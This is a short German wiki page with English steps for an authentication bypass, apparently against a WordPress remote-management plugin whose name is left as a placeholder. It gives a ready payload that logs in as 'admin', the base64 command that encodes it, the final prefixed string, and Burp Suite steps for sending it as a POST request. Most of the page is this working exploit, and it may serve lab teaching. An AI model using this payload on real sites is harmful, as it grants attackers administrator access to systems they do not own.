Authentication Bypass

Aus Xinux Wiki

Version vom 12. April 2022, 14:51 Uhr von Thomas.will (Diskussion | Beiträge)

(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)

Zur Navigation springen Zur Suche springen

Vorbermerkung

Das Plugin (kommt hier noch rein)

Request

Reload the target website and intercept the request using Burp Suite.

Payload

Create the JSON payload and convert it to base64.

Payload: {“iwp_action”:”add_site”,”params”:{“username”:”admin”}}

echo ‘{“iwp_action”:”add_site”,”params”:{“username”:”admin”}}’ | base64 -w0

Append the base64 generated payload with the String mentioned in the exploit URL.

Payload: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQo=

Right-click on Burp suite, and click on the “Change request method” to convert the request from GET to POST.

Place the payload created as POST request arguments.

Click on Forward and turn of the intercept.

Abgerufen von „http://wiki.ixheim.de/index.php?title=Authentication_Bypass&oldid=33027“